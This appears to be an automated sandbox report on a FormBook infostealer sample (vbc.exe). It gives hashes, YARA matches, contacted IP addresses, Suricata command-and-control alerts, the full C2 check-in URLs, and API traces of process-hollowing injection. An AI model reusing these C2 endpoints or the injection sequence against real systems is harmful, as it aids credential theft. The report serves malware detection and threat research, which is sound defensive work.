Summary | ZeroBOX

vbc.exe

NSIS UPX Malicious Library PE File DLL PE32
Category FILE
Machine s1_win7_x6403_us
Started Oct. 21, 2021, 8:48 a.m.
Completed Oct. 21, 2021, 8:51 a.m.
Size 255.1KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 36e60a2ecd13869a78ad7bc9312681d0
SHA256 b6d84072166800bd1d35ca9265107d6f26496c7375411ca818046c5a28dee9d9
CRC32 CB26D732
ssdeep 6144:wBlL/c0Wy5g5EupgNkaSYC7hjbUoVhmVuvqQLWT8ZEkzPe7SsGQNN5X:CegGMpSy+HLzzQ5X
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • NSIS_Installer - Null Soft Installer

IP Address Status Action
1.32.254.106 Active Moloch
108.186.180.79 Active Moloch
15.197.142.173 Active Moloch
154.208.173.145 Active Moloch
164.124.101.2 Active Moloch
185.28.21.80 Active Moloch
192.185.131.238 Active Moloch
23.225.30.171 Active Moloch
34.102.136.180 Active Moloch
45.156.25.115 Active Moloch
51.210.156.16 Active Moloch
51.81.27.134 Active Moloch
64.190.62.111 Active Moloch
66.29.130.249 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49170 -> 185.28.21.80:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 51.210.156.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 51.210.156.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 51.210.156.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 51.81.27.134:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 51.81.27.134:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49172 -> 51.81.27.134:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 15.197.142.173:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 1.32.254.106:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 15.197.142.173:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 1.32.254.106:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49176 -> 15.197.142.173:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49183 -> 1.32.254.106:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 45.156.25.115:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49181 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 45.156.25.115:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49178 -> 45.156.25.115:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 108.186.180.79:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49175 -> 108.186.180.79:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 192.185.131.238:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 192.185.131.238:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49174 -> 23.225.30.171:80 2031088 ET HUNTING Request to .XYZ Domain with Minimal Headers Potentially Bad Traffic
TCP 192.168.56.103:49175 -> 108.186.180.79:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49180 -> 192.185.131.238:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49179 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 64.190.62.111:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 64.190.62.111:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49177 -> 64.190.62.111:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 154.208.173.145:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.29.130.249:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 154.208.173.145:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.29.130.249:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 154.208.173.145:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49182 -> 66.29.130.249:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

GlobalMemoryStatusEx

Status: 1  Return: 1  Repeated: 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.sattaking-gaziabad.xyz/mxnu/?Bn=UvUEtIev0LW0Fj9rimgEuaxF8o8Q3PSD9GE10acJUnczNTSiUTsn1kpqflxWWG28G9vjgVED&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.tbrhc.com/mxnu/?Bn=dBbPwQ2utUd0Fk1uS+XSFkxz2YTUNCneFR1VLIh1vAwAXkSpHWWkzNznjyqcoekG5m5H1qts&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.bloomberq.online/mxnu/?Bn=o/KNCiHRrXr1o29jsX2904nvUZgzeoF4AFrLsvPkY5gMkei+B/BqpGS5xpPFUL1iDO9N2GeW&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.dealsbonaza.com/mxnu/?Bn=2XZi6uL7RRI0HDIg3Z0ea+lj0YcIWEabg1/ZNYSjdnZm54tZzsSO4EI/xU1ISKPr2aPXOSCI&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.029atk.xyz/mxnu/?Bn=6sRgvWVFBb3Q/xwRSmzppKeefWZYMhtu8mXrbS5z1U4Jv8b+WQjv+VljYqCaCxejjINp6HL4&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.desongli.com/mxnu/?Bn=hZ80obWBB1Dtx9mJDJ/B6KhSbXm9N4IXZ9kDZpitpQpTEQWdqR+8a/o3g7qjE+O8VqYt5r7Y&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.gatescres.com/mxnu/?Bn=/h7P8W3KCMqF8sHgbHgxGw3KDEtccpvlr5o0RXreZvWALZ7/fG1Fr8cUEgi4cFDVX1k6R9aW&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.mortgagerates.solutions/mxnu/?Bn=e40TMWWr6xWVnQ1HwCqLobeJF4L/Z7xCu7/MTKlaRXTCRzwsua34O9neh9w9TPhFkJc6vnSR&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.technichoffghosts.com/mxnu/?Bn=/Fzie1hELeLn7MgSxS1T5SAjvZfamumVbzPuvONP0wKdG4fvdY2IoYOIDGhEOLvFBokHwHx6&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.naplesconciergerealty.com/mxnu/?Bn=hecv2sMFcvsyFIpzJOhZbtwMh1SG6St5/U1aPglBFWownzq2qPNpvMi/ho6Sg43JWpVw027R&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.procurovariedades.com/mxnu/?Bn=e63Yw596e9MjmhIdNsSN67oqb96/kwQ/AvXQ3UsARMy+g2BaAqseTyVnaYCqY6LOFgU8MBS4&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.beachpawsmobilegrooming.com/mxnu/?Bn=3UKcWFD9qZdXpkVuTcyfqHC/sdECx0yJ3q4li0xBqZgcBHBJtb4svrVHA8vfZfIzEwm5PxFs&lvKh=X2MpoVAPDvDTUR1
suspicious_features GET method with no useragent header suspicious_request GET http://www.sasanos.com/mxnu/?Bn=vShkcGmQMOINLoOK1pp5XZ1rGlflh1VAH/34JiSotphbghGO08HZN9gmT907Sqcijb1eTDKK&vRitR=7nGDYVy8sr
suspicious_features GET method with no useragent header suspicious_request GET http://www.877961.com/mxnu/?Bn=aHYJt+cF3uKE/jjIR1o9yP3wzE0OqMGB2AjKuxgiPGP7v0vlkCnn7S+a/Vapc30Z99lnekHH&vRitR=7nGDYVy8sr
request GET http://www.sattaking-gaziabad.xyz/mxnu/?Bn=UvUEtIev0LW0Fj9rimgEuaxF8o8Q3PSD9GE10acJUnczNTSiUTsn1kpqflxWWG28G9vjgVED&lvKh=X2MpoVAPDvDTUR1
request GET http://www.tbrhc.com/mxnu/?Bn=dBbPwQ2utUd0Fk1uS+XSFkxz2YTUNCneFR1VLIh1vAwAXkSpHWWkzNznjyqcoekG5m5H1qts&lvKh=X2MpoVAPDvDTUR1
request GET http://www.bloomberq.online/mxnu/?Bn=o/KNCiHRrXr1o29jsX2904nvUZgzeoF4AFrLsvPkY5gMkei+B/BqpGS5xpPFUL1iDO9N2GeW&lvKh=X2MpoVAPDvDTUR1
request GET http://www.dealsbonaza.com/mxnu/?Bn=2XZi6uL7RRI0HDIg3Z0ea+lj0YcIWEabg1/ZNYSjdnZm54tZzsSO4EI/xU1ISKPr2aPXOSCI&lvKh=X2MpoVAPDvDTUR1
request GET http://www.029atk.xyz/mxnu/?Bn=6sRgvWVFBb3Q/xwRSmzppKeefWZYMhtu8mXrbS5z1U4Jv8b+WQjv+VljYqCaCxejjINp6HL4&lvKh=X2MpoVAPDvDTUR1
request GET http://www.desongli.com/mxnu/?Bn=hZ80obWBB1Dtx9mJDJ/B6KhSbXm9N4IXZ9kDZpitpQpTEQWdqR+8a/o3g7qjE+O8VqYt5r7Y&lvKh=X2MpoVAPDvDTUR1
request GET http://www.gatescres.com/mxnu/?Bn=/h7P8W3KCMqF8sHgbHgxGw3KDEtccpvlr5o0RXreZvWALZ7/fG1Fr8cUEgi4cFDVX1k6R9aW&lvKh=X2MpoVAPDvDTUR1
request GET http://www.mortgagerates.solutions/mxnu/?Bn=e40TMWWr6xWVnQ1HwCqLobeJF4L/Z7xCu7/MTKlaRXTCRzwsua34O9neh9w9TPhFkJc6vnSR&lvKh=X2MpoVAPDvDTUR1
request GET http://www.technichoffghosts.com/mxnu/?Bn=/Fzie1hELeLn7MgSxS1T5SAjvZfamumVbzPuvONP0wKdG4fvdY2IoYOIDGhEOLvFBokHwHx6&lvKh=X2MpoVAPDvDTUR1
request GET http://www.naplesconciergerealty.com/mxnu/?Bn=hecv2sMFcvsyFIpzJOhZbtwMh1SG6St5/U1aPglBFWownzq2qPNpvMi/ho6Sg43JWpVw027R&lvKh=X2MpoVAPDvDTUR1
request GET http://www.procurovariedades.com/mxnu/?Bn=e63Yw596e9MjmhIdNsSN67oqb96/kwQ/AvXQ3UsARMy+g2BaAqseTyVnaYCqY6LOFgU8MBS4&lvKh=X2MpoVAPDvDTUR1
request GET http://www.beachpawsmobilegrooming.com/mxnu/?Bn=3UKcWFD9qZdXpkVuTcyfqHC/sdECx0yJ3q4li0xBqZgcBHBJtb4svrVHA8vfZfIzEwm5PxFs&lvKh=X2MpoVAPDvDTUR1
request GET http://www.sasanos.com/mxnu/?Bn=vShkcGmQMOINLoOK1pp5XZ1rGlflh1VAH/34JiSotphbghGO08HZN9gmT907Sqcijb1eTDKK&vRitR=7nGDYVy8sr
request GET http://www.877961.com/mxnu/?Bn=aHYJt+cF3uKE/jjIR1o9yP3wzE0OqMGB2AjKuxgiPGP7v0vlkCnn7S+a/Vapc30Z99lnekHH&vRitR=7nGDYVy8sr
NtProtectVirtualMemory

process_identifier: 2284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10009000
process_handle: 0xffffffff
Status: 1  Return: 0  Repeated: 0

NtAllocateVirtualMemory

process_identifier: 2476
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00930000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
Status: 1  Return: 0  Repeated: 0
file C:\Users\test22\AppData\Local\Temp\nsgB75.tmp\dzksq.dll
LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
Status: 1  Return: 1  Repeated: 0
NtAllocateVirtualMemory

process_identifier: 2476
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000220
Status: 1  Return: 0  Repeated: 0
Process injection: Process 2284 called NtSetContextThread to modify thread in remote process 2476
NtSetContextThread

registers.eip: 2002059716
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314272
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000218
process_identifier: 2476
Status: 1  Return: 0  Repeated: 0
CreateProcessInternalW

thread_identifier: 2480
thread_handle: 0x00000218
process_identifier: 2476
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000220
Status: 1  Return: 1  Repeated: 0

NtGetContextThread

thread_handle: 0x00000218
Status: 1  Return: 0  Repeated: 0

NtAllocateVirtualMemory

process_identifier: 2476
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000220
Status: 1  Return: 0  Repeated: 0

NtSetContextThread

registers.eip: 2002059716
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314272
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000218
process_identifier: 2476
Status: 1  Return: 0  Repeated: 0